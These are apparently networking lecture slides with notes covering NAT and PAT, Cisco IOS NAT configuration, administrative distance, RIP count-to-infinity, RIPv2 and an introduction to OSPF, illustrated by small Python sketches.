in the NAT table. If no translation entry exists, the router determines that
the source address must be translated dynamically, selects a legal global
address from the predefined dynamic address pool, and creates a translation
entry.
Note: static versus dynamic entries.
Example for a static configuration:
ip nat inside source static 10.1.1.1 193.9.9.1
interface ethernet 0
ip address 10.1.1.99 255.0.0.0
ip nat inside
interface serial 0
ip address 193.9.9.99 255.255.255.0
ip nat outside
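The lookup in steps 1) to 3), and the reverse lookup for returning packets described on the following slides, can be sketched as a toy Python class. `SimpleNat` is hypothetical and not a router API: it keeps one table of inside-local to inside-global mappings, seeded with static entries and extended from a dynamic pool, and it translates only the source address outbound and only the destination address inbound.

```python
from __future__ import annotations

class SimpleNat:
    """Toy one-to-one NAT table (hypothetical, not a router API)."""

    def __init__(self, static: dict[str, str], pool: list[str]):
        self.table = dict(static)   # inside local -> inside global (static entries)
        self.pool = list(pool)      # free inside-global addresses for dynamic entries

    def outbound(self, src: str, dst: str) -> tuple[str, str]:
        """Inside-to-outside packet: only the source address is translated."""
        if src not in self.table:
            if not self.pool:
                raise RuntimeError("no free global address: packet dropped")
            self.table[src] = self.pool.pop(0)   # create a dynamic entry
        return self.table[src], dst

    def inbound(self, src: str, dst: str) -> tuple[str, str]:
        """Outside-to-inside packet: map the inside global DA back to inside local."""
        for local, global_ in self.table.items():
            if global_ == dst:
                return src, local
        raise LookupError(f"no translation for {dst}: packet dropped")
```

With the static entry 10.1.1.1 to 193.9.9.1 from the configuration above, `outbound("10.1.1.1", "198.5.5.55")` returns `("193.9.9.1", "198.5.5.55")`, and a reply addressed to 193.9.9.1 is mapped back to 10.1.1.1.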
Basic Principle (1b)
[Figure: Simple NAT Table as in (1a); the packet from 10.1.1.1 to 198.5.5.55 (SA 10.1.1.1, DA 198.5.5.55) leaves the NAT router (193.9.9.99) with SA 193.9.9.1, DA 198.5.5.55]
In many NAT implementations the host portion of an IP address remains
unchanged; only the prefix is translated.
Example for a dynamic configuration:
ip nat pool mynatconf 193.9.9.1 193.9.9.254 netmask 255.255.255.0
ip nat inside source list 1 pool mynatconf
!
interface ethernet 0
ip address 10.1.1.99 255.0.0.0
ip nat inside
!
interface serial 0
ip address 193.9.9.99 255.255.255.0
ip nat outside
!
access-list 1 permit 10.0.0.0 0.255.255.255
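The prefix-only translation mentioned above can be sketched with Python's standard `ipaddress` module: the host bits are carried over and only the network part is replaced. `translate_prefix` is a hypothetical helper, and it assumes both prefixes have the same length (here 10.1.1.0/24 and 193.9.9.0/24, chosen to match the Simple NAT Table rather than the /8 of the configuration).

```python
import ipaddress

def translate_prefix(addr: str, inside_prefix: str, global_prefix: str) -> str:
    """Swap the network part of addr, keeping its host bits (hypothetical helper)."""
    inside = ipaddress.IPv4Network(inside_prefix)
    outside = ipaddress.IPv4Network(global_prefix)
    ip = ipaddress.IPv4Address(addr)
    if inside.prefixlen != outside.prefixlen:
        raise ValueError("this sketch assumes equal prefix lengths")
    if ip not in inside:
        raise ValueError(f"{addr} is not inside {inside_prefix}")
    host_bits = int(ip) - int(inside.network_address)   # e.g. .1, .2, ...
    return str(outside.network_address + host_bits)
```

So `translate_prefix("10.1.1.2", "10.1.1.0/24", "193.9.9.0/24")` gives 193.9.9.2, matching the second row of the Simple NAT Table.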
Basic Principle (1c)
[Figure: Simple NAT Table as in (1a); the reply from 198.5.5.55 arrives at the NAT router (193.9.9.99) with SA 198.5.5.55, DA 193.9.9.1 and is forwarded inside with SA 198.5.5.55, DA 10.1.1.1]
1) Host 198.5.5.55 responds to host 10.1.1.1 by using the inside global
address 193.9.9.1 as destination address.
2) When the router receives a packet with the inside global address 193.9.9.1,
it performs a NAT table lookup to determine the associated inside local
address.
3) The router translates 193.9.9.1 to 10.1.1.1 and forwards the packet to host
10.1.1.1.
FYI:
Inside-to-outside translation occurs after routing
Outside-to-inside translation occurs before routing
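Basic Principle (2a)
[Figure: a left and a right network, both behind NAT routers and both containing a host 10.1.1.1. The left 10.1.1.1 has global address 193.9.9.1; the right 10.1.1.1 has global address 198.5.5.1. Further addresses shown: 198.5.5.55, 193.9.9.99]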
In this example we assume that the PC in the left network wants to send an IP
packet to the PC in the right network. Note that both networks use NAT;
outside is everything between the two NAT-enabled routers.
By accident, both networks use the same inside-local addresses. But this does not
matter anyway; you can just as well imagine two completely different inside-local
addresses.
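Basic Principle (2b)
[Figure: the packet from the left 10.1.1.1 to the right 10.1.1.1. Left inside: SA 10.1.1.1, DA 198.5.5.1. Between the NAT routers: SA 193.9.9.1, DA 198.5.5.1. Right inside: SA 193.9.9.1, DA 10.1.1.1. Further addresses shown: 198.5.5.55, 193.9.9.99]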
Observe these translations as depicted above:
1) The left host (10.1.1.1) sends a packet to the right host (also 10.1.1.1). Of
course, the right host is known by its outside-local address (198.5.5.1),
which is used as destination address.
2) The left NAT-enabled router translates only the source address (which was
an inside-local address) to an inside-global address (193.9.9.1). The
destination address (which is an outside-local address) remains unchanged
and is now called outside-global while the packet traverses the Internet.
3) The right NAT-enabled router only changes the destination address (which
it regards as inside-global) by translating it to an inside-local one. The
source address is regarded as outside-global and remains unchanged, but is
now called outside-local.
Overloading (PAT)
Common problem:
Many-to-one Translation
Aka "PAT"
Many-to-one translation is accomplished by identifying each traffic flow by
its source port number. This method is commonly known as Port Address
Translation (PAT). In the IETF documents you will also see the abbreviation
NAPT. In the Linux world it is known as masquerading.
When N inside hosts use the same source port number, the PAT router will
change N-1 of these identical source port numbers to the next free values.
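A toy Python model of this allocation rule, extended with the pool behaviour described in the notes of the next slide (when an address has no free port left, move on to the next pool address and try the original port again). The `Pat` class is hypothetical: it tracks only (inside IP, inside port) pairs, ignores the protocol and entry timeouts, and its default port range 1024 to 65535 is an assumption.

```python
from __future__ import annotations
from itertools import chain

class Pat:
    """Toy PAT allocator (hypothetical): keep the source port if it is free on a
    global address, otherwise take the next free port; if an address has no free
    port left, try the next pool address, starting again at the original port."""

    def __init__(self, pool: list[str], ports: range = range(1024, 65536)):
        self.pool = pool
        self.ports = ports
        self.used: dict[str, set[int]] = {ip: set() for ip in pool}
        self.table: dict[tuple[str, int], tuple[str, int]] = {}

    def _free_port(self, global_ip: str, wanted: int) -> int | None:
        lo, hi = self.ports.start, self.ports.stop
        first = min(max(wanted, lo), hi)
        # search upward from the wanted port, then wrap around to the range start
        for port in chain(range(first, hi), range(lo, first)):
            if port not in self.used[global_ip]:
                return port
        return None

    def translate(self, inside_ip: str, inside_port: int) -> tuple[str, int]:
        key = (inside_ip, inside_port)
        if key in self.table:                  # existing session: reuse mapping
            return self.table[key]
        for global_ip in self.pool:
            port = self._free_port(global_ip, inside_port)
            if port is not None:
                self.used[global_ip].add(port)
                self.table[key] = (global_ip, port)
                return global_ip, port
        raise RuntimeError("PAT exhausted: drop packet, send ICMP host unreachable")
```

With a single pool address 173.3.8.1, the sessions 10.1.1.1:1034 and 10.1.1.2:2138 keep their ports (as in the following example); a third host also using port 1034 would be given 173.3.8.1:1035.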
Overloading Example (1)
[Figure: inside hosts 10.1.1.1 and 10.1.1.2 connect through a PAT router to web server 65.38.12.9. Inside: SA 10.1.1.1:1034 and SA 10.1.1.2:2138, both with DA 65.38.12.9:80. Outside: SA 173.3.8.1:1034 and SA 173.3.8.1:2138, both with DA 65.38.12.9:80]
Extended Translation Table:
Prot.  Inside Local     Inside Global    Outside Local    Outside Global
TCP    10.1.1.1:1034    173.3.8.1:1034   65.38.12.9:80    65.38.12.9:80
TCP    10.1.1.2:2138    173.3.8.1:2138   65.38.12.9:80    65.38.12.9:80
The port number is the differentiator. Note that the TCP and UDP port number
range allows up to 65,536 numbers per IP address and protocol. This number is the upper
limit for simultaneous translations per inside-global IP address.
If the port numbers run out, PAT will move to the next IP address and try to
allocate the original source port again. This continues until all available ports
and IP addresses are used. If a PAT router runs out of addresses, it drops the
packet and sends an ICMP Host Unreachable message.
Generally, NAT/PAT is only practical when relatively few hosts in a stub
domain communicate outside of the domain at the same time. In this case, only
a small subset of the IP addresses in the own domain must be translated into
globally unique IP addresses.
Overloading Example (2)
[Figure and Extended Translation Table as in Overloading Example (1)]
In this example both inside hosts (10.1.1.1 and 10.1.1.2) connect to the same
outside web server. The outside local addresses are mostly identical to the
outside global addresses, but in some situations we might want to translate
them as well (see the next slides for examples).
The dynamic translation table (or translation matrix) ages out after some time.
The default timeouts are:
Non-DNS UDP 5 minutes (ip nat translation udp-timeout <seconds>)
DNS 1 minute (ip nat translation dns-timeout <seconds>)
TCP 24 hours (ip nat translation tcp-timeout <seconds>)
TCP RST/FIN 1 minute (ip nat translation finrst-timeout <seconds>)
If overloading is not configured, the timeout period is 24 hours by default
(ip nat translation timeout <seconds>).
Configuration for the example above:
ip nat pool mypool 173.3.8.1 173.3.8.5 netmask 255.255.255.0
ip nat inside source list 1 pool mypool overload
interface ethernet 0
ip address 10.1.1.99 255.0.0.0
ip nat inside
interface serial 0
ip address 173.3.8.9 255.255.255.0
ip nat outside
access-list 1 permit 10.0.0.0 0.255.255.255
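The aging rule can be sketched in Python. The timeout values are the defaults listed above; the entry layout (a key mapped to a kind and a last-used timestamp) and the helper names are hypothetical, and a real router ages entries in the background rather than on request.

```python
from __future__ import annotations
import time

# Default Cisco IOS NAT timeouts from the list above, in seconds.
DEFAULT_TIMEOUTS = {
    "udp": 5 * 60,        # non-DNS UDP
    "dns": 60,
    "tcp": 24 * 60 * 60,
    "finrst": 60,         # TCP session after RST/FIN
}

def expired_keys(entries: dict, now: float, timeouts: dict = DEFAULT_TIMEOUTS) -> list:
    """entries: key -> (kind, last_used); return keys idle longer than their timeout."""
    return [key for key, (kind, last_used) in entries.items()
            if now - last_used > timeouts[kind]]

def age_out(entries: dict, now: float | None = None) -> list:
    """Delete expired entries in place and return the deleted keys."""
    now = time.time() if now is None else now
    gone = expired_keys(entries, now)
    for key in gone:
        del entries[key]
    return gone
```

For example, at time 400 s an idle UDP entry (limit 300 s) and a DNS entry last used at 30 s (limit 60 s) are removed, while a TCP entry idle since 0 s stays.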
Overlapping Networks
= Same addresses are used
locally and globally
What can
happen?
Overlapping networks occur if we use non-legal (not officially assigned) IP
addresses that officially belong to another network. We can do that if we use
NAT to translate our internal addresses into global ones. However, if we want
to communicate with the other network (which uses our inside-local addresses as
global ones), we must consider some special issues...
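Outside Address Translation
[Figure: our hidden 9.0.0.0 network (host 9.3.1.2) behind the NAT router, and the "true" 9.0.0.0 network outside (host 9.3.1.8). A packet that came from the "true" 9.0.0.0 network arrives with SA 9.3.1.8, DA 193.9.9.2 and is forwarded inside with SA 10.0.0.8, DA 9.3.1.2]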
First we examine the simple case. Suppose we used a class A network 9.0.0.0
for several years and now we want to give it back to the world (thereby earning
a lot of money from our ISP).
Now we present our network to the outside world through NAT.
Obviously the class A range we gave away will be used by other
customers, so incoming packets might have the same source addresses as we
still use for our devices. Clearly we should renumber our hosts with RFC 1918
private addresses.
But if we had a large number of hosts, we might not want to renumber all
devices. Instead we translate the source addresses of incoming packets if
they come from the true class A network 9.0.0.0. By changing the source to an
outside-local address, our replies to these packets are routed outside instead of
being delivered inside our own 9.0.0.0 network.
DNS Problem (1)
[Figure: inside host 5.1.2.3 in our hidden 5.1.2.0/24 network; host "1ahoo" (5.1.2.10) in the legal 5.1.2.0/24 network outside; DNS server 195.44.33.11. DNS request for host "1ahoo": SA 5.1.2.3 / DA 195.44.33.11]
This is a trickier issue. Usually we do not know the IP addresses of outside
hosts; rather, we ask a DNS server for name resolution.
DNS Problem (2)
[Figure: as above; after translation, the DNS request for host "1ahoo" carries SA 178.12.99.3 / DA 195.44.33.11]
DNS Problem (3)
[Figure: as above; DNS reply: host "1ahoo" is 5.1.2.10, SA 195.44.33.11 / DA 178.12.99.3]
!OVERLAPPING ALERT!
We cannot tell our hosts that "1ahoo" has IP address 5.1.2.10...
They would think that 1ahoo is inside and would try a direct delivery...!!!
But what if the DNS server replies with an IP address which is supposed to be
inside our own network? In this case the NAT router must manipulate the
layer-7 DNS information and translate the outside-global address.
DNS Problem (4)
[Figure: as above; the translated DNS reply: host "1ahoo" is 9.9.9.9, SA 195.44.33.11 / DA 5.1.2.3]
Now my hosts must ask me where 9.9.9.9 is...
The router examines every DNS reply, ensuring that the resolved address is not
used inside. In such overlapping situations the router translates the address.
Note:
Cisco NAT is able to inspect and perform address translation on A (Address)
and PTR (Pointer) DNS resource records.
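A hedged Python sketch of this DNS rewriting (often called a DNS application-level gateway): an A-record address that falls into our own inside prefix is replaced by an outside-local address, and the mapping is remembered so that outgoing packets to that outside-local address can be translated back. `DnsAlg` is hypothetical; it handles only bare addresses, not DNS messages or PTR records, and it hands out pool addresses from 9.9.9.1 upward, so the first rewrite yields 9.9.9.1 rather than the 9.9.9.9 shown on the slides.

```python
from __future__ import annotations
import ipaddress

INSIDE_NET = ipaddress.IPv4Network("5.1.2.0/24")          # our hidden, overlapping network
OUTSIDE_LOCAL_POOL = ipaddress.IPv4Network("9.9.9.0/24")  # addresses shown to inside hosts

class DnsAlg:
    """Hypothetical DNS rewriting helper for overlapping networks."""

    def __init__(self) -> None:
        self.outside_local: dict[str, str] = {}      # outside global -> outside local
        self._free = iter(OUTSIDE_LOCAL_POOL.hosts())  # 9.9.9.1, 9.9.9.2, ...

    def rewrite_a_record(self, resolved: str) -> str:
        """Address in a DNS reply travelling to the inside."""
        if ipaddress.IPv4Address(resolved) not in INSIDE_NET:
            return resolved                           # no overlap: leave it alone
        if resolved not in self.outside_local:
            self.outside_local[resolved] = str(next(self._free))
        return self.outside_local[resolved]

    def outbound_destination(self, dst: str) -> str:
        """DA of a packet leaving the inside: outside local -> outside global."""
        for global_ip, local_ip in self.outside_local.items():
            if local_ip == dst:
                return global_ip
        return dst
```

`rewrite_a_record("5.1.2.10")` returns an address from 9.9.9.0/24, while an address outside 5.1.2.0/24 passes unchanged; `outbound_destination` performs the reverse step shown on the next slide.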
DNS Problem (5)
[Figure: as above; message for host "1ahoo": SA 5.1.2.3 / DA 9.9.9.9. DA 9.9.9.9...? Must be translated]
Of course, if the destination address of an outgoing packet matches a previously
introduced outside-local address, it must be translated into an outside-global
address.
The same is done in the converse situation, where the DNS server is
inside and a DNS request is sent by an outside host. If the name resolution
results in an inside local address, the NAT router has to translate this address.
NOTE: Cisco IOS does not translate addresses inside DNS zone transfers.
DNS Problem (6)
[Figure: as above; message for host "1ahoo" after translation: SA 195.44.33.11 / DA 5.1.2.10]
NAT Table:
Inside Local   Inside Global    Outside Global   Outside Local
5.1.2.3        195.44.33.11     5.1.2.10         9.9.9.9
To prepare our router for overlapping addresses we use either a static or a
dynamic configuration.
Static: (the rest is similar to the previous examples)
ip nat outside source static 5.1.2.10 9.9.9.9
Dynamic:
ip nat pool insidepool 195.44.33.11 195.44.33.13 netmask 255.255.255.0
ip nat pool outsidepool 9.9.9.1 9.9.9.255 prefix-length 24
ip nat inside source list 1 pool insidepool
ip nat outside source list 1 pool outsidepool
!
interface ethernet0
ip address 5.1.2.99 255.0.0.0
ip nat inside
!
interface serial0
ip address 195.44.33.99 255.255.255.0
ip nat outside
!
access-list 1 permit 5.1.2.0 0.0.0.255
TCP Load Sharing (1)
Multiple servers represented by a
single inside-global IP address
Rotary group
TCP load sharing is an enhanced NAT feature and is used inside the intranet,
because it has nothing to do with private address translation. If we want to
offer a heavily loaded specific service to users, we can employ a NAT router to
map a single inside-global address (the virtual host address, which is known to
the users) to multiple inside-local addresses, each assigned to a real host.
Every time a user connects to the virtual host and wants to establish a session,
this session is mapped to one of the real hosts in a round-robin manner. That is
why the group of real hosts is called a "rotary group".
Note that the NAT router has no idea of the load distribution. Nor does the
router know whether the service is available!
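The round-robin mapping can be sketched in Python with `itertools.cycle`. The `RotaryGroup` class and all addresses used with it are hypothetical. As on the slide, the sketch knows nothing about server load or availability; it only hands each new session to the next real host and keeps existing sessions where they are.

```python
from __future__ import annotations
from itertools import cycle

class RotaryGroup:
    """Hypothetical TCP load sharing: one virtual address, several real hosts."""

    def __init__(self, virtual_ip: str, real_hosts: list[str]) -> None:
        self.virtual_ip = virtual_ip
        self._next_host = cycle(real_hosts)                 # round-robin order
        self.sessions: dict[tuple[str, int], str] = {}      # (client IP, port) -> real host

    def connect(self, client_ip: str, client_port: int) -> str:
        """Return the real host that serves this TCP session."""
        key = (client_ip, client_port)
        if key not in self.sessions:            # only NEW sessions are distributed
            self.sessions[key] = next(self._next_host)
        return self.sessions[key]
```

Three new clients are spread over two real hosts as first, second, first; a packet of an already known session goes to the same host as before.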
NAT and FTP
FTP control session negotiates port
numbers
Mailfilters etc.
Encrypted L3 payload must not
contain address/port information
Some NAT routers perform stateful packet inspection (SPI), which allows
NAT devices to filter harmful packets such as SYN floods. SPI is merely a
marketing term meaning enhanced firewalling features.
NAT cannot translate payload address information if the payload is encrypted.
Secure Socket Layer (SSL) and Secure Shell (SSH) are implemented as
encrypted TCP payload, but the TCP header is not encrypted. Thus, NAT can
deal with SSL and SSH without problems. On the other hand, problems may
occur with Kerberos, X-Windows, Session Initiation Protocol (SIP), remote
shell (RSH), and other NAT-sensitive protocols.
Drawbacks of NAT
Translation is resource intensive (delays)
Encrypted protocols cannot be translated
Increased probability of mis-addressing
Might not support all applications
Hiding hosts might be a negative effect
Problems with SNMP, DNS, ...
Resource demand means that the translation matrix requires lots of RAM, while
augmented protocol handling requires CPU power.
Each NAT session consumes about 160 bytes of DRAM (using Cisco IOS).
From this we conclude that 10,000 translations would consume about 1.6 MB.
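The estimate is a single multiplication; a tiny Python sketch makes the units explicit. The 160-byte figure is the approximate value quoted above, not a measured constant, and the helper name is hypothetical.

```python
BYTES_PER_TRANSLATION = 160  # approximate per-entry cost quoted above (Cisco IOS)

def nat_table_bytes(translations: int) -> int:
    """Estimated DRAM needed for a NAT table with the given number of entries."""
    return translations * BYTES_PER_TRANSLATION

needed = nat_table_bytes(10_000)
print(needed)                            # 1600000
print(needed / 1_000_000, "MB")          # 1.6 MB (decimal megabytes)
print(round(needed / 2**20, 2), "MiB")   # 1.53 MiB (binary mebibytes)
```

So the 1.6 MB on the slide is meant in decimal units; in binary units it is roughly 1.53 MiB.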
Mis-addressing occurs because the administrator is responsible for a proper NAT
configuration.
SNMP traffic is not supported by Cisco IOS NAT because of the MIB-
dependent style of SNMP packets.
Configuration Commands (1)
Declare interfaces to be
inside/outside
ip nat { inside | outside }
Define a pool of addresses (global)
ip nat pool <name> <start-ip> <end-ip> { netmask <netmask> | prefix-length <prefix-length> } [ type { rotary } ]
Note that a pool of addresses is only needed for dynamic translation.
If you plan to employ static translation only, you can skip the second command.
Configuration Commands (2)
Enable translation of inside source
addresses
ip nat inside source { list <acl> pool <name> [overload] | static <local-ip> <global-ip> }
Enable translation of inside destination
addresses
ip nat inside destination { list <acl> pool <name> | static <global-ip> <local-ip> }
Enable translation of outside source
addresses
ip nat outside source { list <acl> pool <name> | static <global-ip> <local-ip> }
Packets from addresses that match the simple access list are translated
dynamically using the previously defined address pool. The keyword
[overload] enables PAT. The access list must permit only those addresses that
are to be translated.
Inside destination address translation should use addresses from a previously
defined rotary pool. A destination address (of an incoming packet) matching
the access list will be replaced with an address of the rotary pool in a round-robin
manner. See the previous section about TCP load sharing.
Outside source address translation is necessary for overlapping networks. See
the corresponding previous section.
Clearing Commands
Clear all dynamic NAT table entries
clear ip nat translation *
Clear a simple dynamic inside or inside+outside
translation entry
clear ip nat translation inside <global-ip> <local-ip> [outside <local-ip> <global-ip>]
Clear a simple dynamic outside translation entry
clear ip nat translation outside <local-ip> <global-ip>
Direct Delivery
Indirect Delivery
Static Routing
Default Routing
Dynamic Routing
Hop count
Can be changed
If several different routing protocols suggest different paths to the same
destination at the same time, the router makes a trust decision based on the
"Administrative Distance", which is a Cisco feature. Each routing protocol is
assigned a static AD value indicating its "trustworthiness": the lower, the better. Of
course, these values can be manipulated for special purposes.
Administrative Distances Chart
Route source                      Default AD
Directly Connected                0
Static route through interface    0
Static route to next hop          1
EIGRP Summary Route               5
E-BGP                             20
I-EIGRP                           90
IGRP                              100
OSPF                              110
IS-IS                             115
RIP                               120
EGP                               140
E-EIGRP                           170
I-BGP                             200
Unknown                           255
Note the difference between the two kinds of static route: a static route pointing to a
next-hop address has AD 1, while a static route pointing out of an interface is treated as
directly connected (AD 0).
AD also tells the router that E-BGP updates are more trustworthy than I-BGP
messages.
Remember
1) Using its METRIC, a routing protocol determines the
best path to a destination.
2) A router running multiple routing protocols might be told
about multiple possible paths to one destination.
3) Here the METRIC cannot help with the decision, because different
types of METRICS cannot be compared with each other.
4) A router chooses the route proposed by the
routing protocol with the lowest ADMINISTRATIVE DISTANCE.
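The four rules can be turned into a short Python sketch: among candidate routes to one destination, take the lowest administrative distance first and let the metric decide only between routes with the same AD. The protocol keys and the candidate tuples are hypothetical; the AD values are the defaults from the chart above, and routes with AD 255 are never used.

```python
from __future__ import annotations

# Default administrative distances from the chart above.
ADMIN_DISTANCE = {
    "connected": 0, "static": 1, "eigrp-summary": 5, "ebgp": 20,
    "eigrp": 90, "igrp": 100, "ospf": 110, "isis": 115, "rip": 120,
    "egp": 140, "eigrp-external": 170, "ibgp": 200, "unknown": 255,
}

def best_route(candidates: list[tuple[str, str, int]]) -> tuple[str, str, int] | None:
    """candidates: (protocol, next hop, metric) tuples for ONE destination.
    The lowest AD wins; the metric only breaks ties within the same AD,
    because metrics of different protocols are not comparable."""
    usable = [c for c in candidates if ADMIN_DISTANCE[c[0]] < 255]  # AD 255 = never trusted
    if not usable:
        return None
    return min(usable, key=lambda c: (ADMIN_DISTANCE[c[0]], c[2]))
```

Offered the same destination by RIP, OSPF and internal EIGRP, the sketch picks the EIGRP route (AD 90), regardless of the metric values.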
AD with Static Routes
Each static route can be given a different
administrative distance
This way fall-back routes can be
configured
[Figure: three static routes to the same destination with AD = 5, AD = 10 and AD = 20; one of the paths is a dial-up ISDN link]
In the example above, there are several static routes to the same destination. There
are three paths of different quality (more or fewer hops, BW, ...), so every path
is assigned a different AD. If there are problems with the main path (AD 5), the
router automatically changes to the next path (AD 10), and so on.
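Such fall-back (floating) static routes can be sketched in Python as well: the route in use is the one with the lowest AD whose path is currently up. `StaticRoute`, `active_route` and the next-hop names are hypothetical; the `link_up` flag stands in for the router withdrawing a static route whose path has failed.

```python
from __future__ import annotations
from dataclasses import dataclass

@dataclass
class StaticRoute:
    next_hop: str        # hypothetical next-hop name
    distance: int        # administrative distance given to this static route
    link_up: bool = True

def active_route(routes: list[StaticRoute]) -> StaticRoute | None:
    """The route in use is the usable one with the lowest administrative distance."""
    usable = [r for r in routes if r.link_up]
    return min(usable, key=lambda r: r.distance, default=None)
```

With routes of AD 5, 10 and 20, taking the main path down makes the AD 10 route active; taking that one down too leaves only the AD 20 (ISDN) route.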
Classification
Depending on age:
Signpost principle
Loops can occur!
Additional mechanisms needed:
Triggered update
Hold down
Examples: RIP, RIPv2, IGRP (Cisco)
Routing loops are big problems with distance vector protocols. Because of the
simple principle of distance vector protocols, we cannot prevent routing loops.
Access lists, disconnections and connections, router malfunctions, etc. can always
lead to them; there is no 100% solution.
Link State (1)
Each two neighboring routers
establish adjacency
Routers learn real topology
information
Propagated by flooding
(very fast convergence)
Link-state routing protocols were designed for large networks. These
protocols are more reliable and converge fast.
The smallest topological unit is simply the information: ROUTER-LINK-
ROUTER
Link State (2)
Routing table entries are calculated
by applying the Shortest Path First
(SPF) algorithm on the database
Loop-safe
[Figure: Distance Vector versus Link State]
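For illustration, here is a compact Python version of Dijkstra's SPF algorithm run on a link-state database. The database format (router mapped to its neighbors and link costs), the router names and the costs are assumptions for the example; the result lists, for each destination, the total cost and the first hop from the computing router, which is what a routing table entry needs.

```python
from __future__ import annotations
import heapq

def spf(lsdb: dict[str, dict[str, int]], root: str) -> dict[str, tuple[int, str | None]]:
    """Dijkstra's Shortest Path First on a link-state database.
    lsdb: router -> {neighbour: link cost}. Returns, per destination router,
    (total cost, first hop from root); the root itself gets first hop None."""
    result: dict[str, tuple[int, str | None]] = {}
    heap: list = [(0, root, None)]
    while heap:
        cost, node, first_hop = heapq.heappop(heap)
        if node in result:
            continue                          # a cheaper path was already settled
        result[node] = (cost, first_hop)
        for neighbour, link_cost in lsdb.get(node, {}).items():
            if neighbour not in result:
                hop = neighbour if node == root else first_hop
                heapq.heappush(heap, (cost + link_cost, neighbour, hop))
    return result
```

In the four-router test topology, router A reaches D at cost 3 through first hop B (path A-B-C-D) instead of A-B-D at cost 6.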
Quiz
What are advantages of static
routing?
What are advantages of dynamic
routing?
Why are default routes used to
access the Internet?
Why is the convergence time lower
with link-state routing protocols?
RIP
Signpost Routing, Version 1
Routing Information Protocol
Interior Gateway Protocol (IGP)
Distance-Vector Routing Protocol
Destination network
Access lists
Router malfunctions
....
During that time, routing loops occur!
Because of the simple principle of RIP (a distance vector protocol), we cannot
prevent Count to Infinity. Access lists, disconnections and connections, router
malfunctions, etc. can always lead to it; there is no 100% solution.
We need a more general approach to stop it: the Maximum Hop Count. That is
the only failsafe solution.
Count To Infinity (1)
[Figure: Routers A, B, C and D interconnect networks 1.0.0.0, 2.0.0.0, 3.0.0.0 and 4.0.0.0. Routing table excerpts: one table lists 2.0.0.0 as unknown (???); another lists 4.0.0.0 as directly connected (e0) and 2.0.0.0 at 2 hops via s0]
Let us look at another example where Count to Infinity occurs, although
Split Horizon is implemented!
We have a network with 4 routers; suddenly net 2 crashes.
Count To Infinity (2)
[Figure: as above, with a new link between Router B and Router D. Router D sends a routing update (SA=D) advertising 2.0.0.0 with 3 hops; the receiving table now lists 2.0.0.0 at 3 hops via s2, the other table still lists 2.0.0.0 at 2 hops via s0]
And a new connection is established between router B and router D. Now a normal
routing update is sent from router D to router B (with information about net 2, of
course).
Count To Infinity (3)
[Figure: as above. Router B advertises 2.0.0.0 with 4 hops (SA=B) to its neighbors, Router C advertises 2.0.0.0 with 5 hops (SA=C); the tables now list 2.0.0.0 at 3 hops via s2 and at 5 hops via s0]
Router B does not know that network 2 is gone. So it sends information about
network 2 (increasing the hop count by 1) to every neighbor router.
Count To Infinity (4)
[Figure: as above. Router D advertises 2.0.0.0 with 6 hops (SA=D); the tables now list 2.0.0.0 at 6 hops via s2 and at 5 hops via s0]
Count to Infinity situations cannot be avoided in
every situation (drawback of the signpost principle)
Basic solution: Maximum Hop Count = 16
Count to infinity occurs. Only the maximum hop count, the basic solution, can
stop this problem.
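The effect can be reproduced with a small Python simulation of synchronous distance-vector rounds with split horizon for a single destination. It is a simplified model under stated assumptions, not RIP itself: three routers X, Y and Z (hypothetical names) form a loop, X has just lost the network, every round each router recomputes its route from its neighbors' previous advertisements, and hop count 16 means unreachable. Real RIP timers differ, so the number of rounds is only illustrative.

```python
INFINITY = 16          # RIP: a hop count of 16 means "unreachable"
UPDATE_INTERVAL = 30   # seconds between periodic RIP updates

def count_to_infinity(links, routes, max_rounds=100):
    """Synchronous distance-vector rounds with split horizon for ONE destination.

    links:  router -> list of neighbour routers
    routes: router -> (hops, next_hop) right after the failure
    Returns (rounds until every router reports INFINITY, final routes)."""
    for rounds in range(1, max_rounds + 1):
        new_routes = {}
        for router, neighbours in links.items():
            # Each neighbour advertises its previous route, except back to the
            # router it learned that route from (split horizon).
            offers = [(routes[n][0] + 1, n) for n in neighbours
                      if routes[n][1] != router and routes[n][0] + 1 < INFINITY]
            new_routes[router] = min(offers) if offers else (INFINITY, None)
        routes = new_routes
        if all(hops == INFINITY for hops, _ in routes.values()):
            return rounds, routes
    return None, routes
```

For a triangle in which Y and Z had learned the network from X, the stale route circles the loop one hop longer per round and only disappears after 15 rounds, i.e. 450 seconds at one update every 30 seconds: the same order of magnitude as the 480 seconds quoted for RIP below.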
Maximum Hop Count = 16
[Figure: the same four routers. (1) Upon the failure, the entry for 2.0.0.0 is set to 16 hops. (2) Router B advertises 2.0.0.0 with 16 hops (SA=B) to its neighbors. (3), (4) The neighbors enter 2.0.0.0 with 16 hops (invalid) in their tables]
Upon network failure, the route is marked as INVALID (hop count 16) and propagated.
With a hop count of 16, net 2 is now marked as invalid.
Of course, this unreachability information would be propagated deeper into the
network if there were additional routers.
Maximum Hop Count
Defining a maximum hop count of 16
provides a basic safety factor
But restricts the maximum network
diameter
Routing loops might still exist for
480 seconds (16 × 30 s)
Therefore several other measures are
necessary
The maximum hop count is a basic safety factor, but it is also the main drawback
of RIP. It restricts the maximum network diameter, and routing loops can exist for
up to 480 seconds. During Count to Infinity there is bad routing, and the network must
deal with unnecessary traffic. So we need other measures like Poison Reverse.
Additional Measures
Split Horizon
External timer
Split Horizon
Poison Reverse
Hold Down
Classless, Slow, Simple
Quiz
How could slower gateways/links be
considered for route calculation?
Wouldn't TCP be more reliable than
UDP?
Does a maximum hop count mean that
I can only have 15 net-IDs?
RIP Version 2
The Classless Brother
Why RIPv2
Need for subnet information and VLSM
Need for Next Hop addresses for each
route entry
Need for external route tags
Need for multicast route updates
RFC 2453
Because subnetting and VLSM became more important, RIPv2 was created. RIPv2
was introduced in RFC 1388, "RIP Version 2 Carrying Additional Information",
January 1993. This RFC was obsoleted in 1994 by RFC 1723, and RFC
2453 is the final document about RIPv2.
In comparison with RIPv1, RIPv2 also supports several new features, such
as routing domains, route advertisements via EGP protocols, or authentication.
Multicast Updates
RIPv1 used DA=broadcast
UPDATE
INVALID
HOLDDOWN
FLUSH
Same convergence protections
Split Horizon
Poison Reverse
Hold Down
RIP is slow
RIP is unreliable
Designed to be reliable
Yes, RIP is
bad
Voodoo...
OSPF was developed by the IETF to replace RIP. In general, link-state routing
protocols have some advantages over distance vector protocols, like faster convergence
and support for larger networks.
Some other features of OSPF include the use of areas, which makes
hierarchical network topologies possible, and classless behavior, so there is no problem
with discontiguous subnets as in RIP. OSPF also supports VLSM
and authentication.
OSPF Background
OSPF is the IGP recommended by the IETF
"Open" means "not proprietary"
Dijkstra's Shortest Path First algorithm is
used to find the best path
OSPF's father: John Moy
Protocol number 89
Error recovery and session
